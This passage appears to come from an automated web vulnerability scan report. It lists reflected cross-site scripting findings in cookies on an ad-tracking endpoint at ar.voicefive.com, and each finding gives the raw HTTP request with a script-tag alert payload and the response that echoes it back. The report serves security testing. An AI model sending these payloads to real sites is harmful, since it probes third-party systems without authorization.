Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 89751<script>alert(1)</script>437b51d0042 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=189751<script>alert(1)</script>437b51d0042

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:39 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31592

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&', "ar_p82806590": 'exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&', "BMX_3PC": '189751<script>alert(1)</script>437b51d0042', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25
...[SNIP]...

1.418. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 37072<script>alert(1)</script>18bb69f9146 was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p84552060=exp=2&initExp=Tue Jun 28 01:28:15 2011&recExp=Tue Jun 28 01:28:46 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; BMX_G=method->-1,ts->1309224495; BMX_3PC=1; UID=33da324b-72.246.30.136-1309224496; BMX_BR=pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=130922452637072<script>alert(1)</script>18bb69f9146

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:52:00 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=4&initExp=Tue Jun 28 01:28:15 2011&recExp=Tue Jun 28 01:52:00 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:52:00 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31911

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "BMX_BR": 'pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=130922452637072<script>alert(1)</script>18bb69f9146', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p45555483": 'exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18
...[SNIP]...

1.419. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 6d94c<script>alert(1)</script>0d9053e628b was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->13092241976d94c<script>alert(1)</script>0d9053e628b; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:39 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309224211', "BMX_G": 'method->-1,ts->13092241976d94c<script>alert(1)</script>0d9053e628b', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p45555483": 'exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18
...[SNIP]...

1.420. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 4dd06<script>alert(1)</script>63122943029 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-13056631724dd06<script>alert(1)</script>63122943029; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:38 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
1794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-13056631724dd06<script>alert(1)</script>63122943029', "ar_p104939219": 'exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&', "ar_p85001580": 'exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:
...[SNIP]...

1.421. http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p101866669 cookie is copied into the HTML document as plain text between tags. The payload bd822<script>alert(1)</script>03b492754ea was submitted in the ar_p101866669 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&bd822<script>alert(1)</script>03b492754ea; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:36 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
n Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&bd822<script>alert(1)</script>03b492754ea', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13
...[SNIP]...

1.422. http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p101945457 cookie is copied into the HTML document as plain text between tags. The payload c3615<script>alert(1)</script>f2d5fdb572c was submitted in the ar_p101945457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&c3615<script>alert(1)</script>f2d5fdb572c; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:36 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&c3615<script>alert(1)</script>f2d5fdb572c', "BMX_BR": 'pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309224211', "BMX_G": 'method->
...[SNIP]...

1.423. http://ar.voicefive.com/bmx3/broker.pli [ar_p101983071 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p101983071 cookie is copied into the HTML document as plain text between tags. The payload f8562<script>alert(1)</script>3bed94fd4d2 was submitted in the ar_p101983071 cookie. This input was echoed unmodified in the application's response.

